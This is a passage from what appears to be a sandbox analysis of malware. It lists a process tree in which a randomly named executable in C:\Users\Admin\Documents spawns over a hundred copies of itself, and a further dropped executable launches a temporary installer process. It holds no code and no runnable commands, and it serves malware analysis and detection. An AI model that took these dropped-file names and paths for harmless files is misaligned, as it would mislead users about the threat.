    3⤵
    - Executes dropped EXE
    PID:4168
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:9644
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:10328
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:10856
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:7220
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:10976
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:9772
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:9016
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:11404
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:12036
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:11860
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:11740
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:5632
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:8592
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:3640
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:9352
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:12520
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:13004
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:10192
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:10480
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:2204
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:13260
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:12540
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:13208
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:11568
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:13660
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:14184
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:11324
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:14104
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:13436
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:10384
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:9516
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:14844
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:13976
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:15124
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:15284
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:12660
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:15636
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:16172
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:16284
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:13228
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:16168
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:16536
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:14528
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:16832
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:17928
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:17032
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:7576
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:16460
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:17772
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:17856
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:16644
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:18428
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:17604
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:18484
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:18900
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:19268
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:17608
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:17840
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:17844
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:5880
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:3636
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:18512
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:15616
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:19888
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:20324
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:19700
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:20216
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:20408
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:20248
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:18960
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:19700
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:19320
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:12260
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:21060
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:21996
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:20980
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:17960
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:22748
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:23536
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:17448
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:23728
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:22396
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:23524
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:24784
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:24664
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:24780
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:11780
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:3504
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:26544
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:23616
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:24748
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:24212
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:10888
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:26348
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:21744
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:27192
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:26712
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:27504
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:26436
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:26936
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:16788
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:27656
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:28220
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:26932
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:28180
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:27480
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:29488
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:28956
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:29416
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:28148
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:29000
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:29080
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:15608
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:25904
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:20236
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:29448
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:20804
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:22868
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:20612
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:29568
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:27824
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:30560
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:31032
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:31340
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:29952
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:4652
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:5588
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:31296
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:30908
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:31656
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:31312
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:30740
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:7932
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:27620
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:24148
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:29548
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:20696
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:31564
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:23944
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:32096
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:20984
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:31976
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:25660
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:22876
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:31100
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:31176
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:30316
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:5568
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:29472
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:27780
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:26284
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:6456
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:3000
- C:\Users\Admin\Documents\8fUEqwsR4WIiNbU27bDbF0Z3.exe
  "C:\Users\Admin\Documents\8fUEqwsR4WIiNbU27bDbF0Z3.exe"
  2⤵
  - Executes dropped EXE
  PID:3776
- - C:\Users\Admin\AppData\Local\Temp\is-J3B7C.tmp\8fUEqwsR4WIiNbU27bDbF0Z3.tmp
